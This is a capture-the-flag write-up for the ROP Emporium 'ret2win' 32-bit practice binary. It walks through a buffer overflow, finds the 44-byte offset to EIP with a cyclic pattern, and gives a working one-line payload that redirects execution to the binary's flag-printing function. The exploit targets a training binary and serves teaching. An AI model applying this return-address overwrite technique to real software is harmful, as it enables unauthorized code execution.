Ropemporium Ret2win Writeup

Before you proceed any further, make sure you have all the requirements fulfilled.

ASM knowledge
Debugger familiarity
GDB
Basic ROP knowledge
Brain

Setup
In this post, we will try to learn ROP (Return Oriented Programming) by using ropemporium ret2win 32bit binary. Lets setup our machine for debugging by installing PEDA and downloading the target binary.

[email protected]:~/Desktop# cd ~/
[email protected]:~# git clone https://github.com/longld/peda
Cloning into 'peda'...
remote: Counting objects: 324, done.
remote: Total 324 (delta 0), reused 0 (delta 0), pack-reused 324
Receiving objects: 100% (324/324), 243.64 KiB | 111.00 KiB/s, done.
Resolving deltas: 100% (206/206), done.
[email protected]:~# echo "source ~/peda/peda.py" > .gdbinit
[email protected]:~# cd Desktop/
[email protected]:~/Desktop# mkdir ropemporium
[email protected]:~/Desktop# cd ropemporium/
[email protected]:~/Desktop/ropemporium# mkdir ret2win
[email protected]:~/Desktop/ropemporium# cd ret2win/
[email protected]:~/Desktop/ropemporium/ret2win# wget https://ropemporium.com/binary/ret2win32.zip
--2017-09-06 07:51:50--  https://ropemporium.com/binary/ret2win32.zip
Resolving ropemporium.com (ropemporium.com)... 54.192.219.105, 54.192.219.101, 54.192.219.149, ...
Connecting to ropemporium.com (ropemporium.com)|54.192.219.105|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3374 (3.3K) [application/octet-stream]
Saving to: ‘ret2win32.zip’

ret2win32.zip                                      100%[================================================================================================================>]   3.29K  --.-KB/s    in 0s

2017-09-06 07:51:51 (25.9 MB/s) - ‘ret2win32.zip’ saved [3374/3374]

[email protected]:~/Desktop/ropemporium/ret2win# unzip ret2win32.zip
Archive:  ret2win32.zip
  inflating: ret2win32
 extracting: flag.txt
[email protected]:~/Desktop/ropemporium/ret2win#

We have downloaded the binary and extracted it, time to start gdb.

Crash

[email protected]:~/Desktop/ropemporium/ret2win# python -c 'print "A" *200' > ret_payload
[email protected]:~/Desktop/ropemporium/ret2win# ./ret2win32 < ret_payload
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> Segmentation fault

[email protected]:~/Desktop/ropemporium/ret2win# gdb -q ret2win32
Reading symbols from ret2win32...(no debugging symbols found)...done.
gdb-peda$ info functions
All defined functions:

Non-debugging symbols:
0x08048400  [email protected]
0x08048410  [email protected]
0x08048420  [email protected]
0x08048430  [email protected]
............................
0x0804857b  main
0x080485f6  pwnme
0x08048659  ret2win
gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : ENABLED
PIE       : disabled
RELRO     : Partial
gdb-peda$ run < ret_payload

gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'

gdb-peda$ run
Starting program: /root/Desktop/ropemporium/ret2win/ret2win32
ret2win by ROP Emporium
32bits
 
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
 
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA

We have found the offset at 44 which means that the EIP will hold the next 4bytes. We will use a custom boiler plate to ease our exploit development for this binary which can be found in the final exploit.

Flag
This binary is pretty easy to exploit since it imports the system function and has the ‘/bin/cat flag.txt’ string inside the data section. Lets analyze this binary in a disassembler, I will be using Hopper Disassembler for this however you can simply type ‘pdisass ret2win‘ inside gdb to view the same results.

We can see that the ret2win function in this binary itself pushes the memory address of string ‘/bin/cat flag.txt’ to stack and then calls the system() which is indeed very helpful for our objective. We will simply point our return pointer to the start of our ret2win function and be done with it.

[email protected]:~/Desktop/ropemporium/ret2win# python -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
ret2win by ROP Emporium
32bits

For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!

> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
Segmentation fault

We got the flag which is the main objective. I tried to find a way to spawn a shell but didn’t found any useful rop gadgets to do so, our input is truncated after 49 bytes i guess so only 1 byte overwrite in the stack after our return pointer overwrite.

                                         ——END——
3 Likes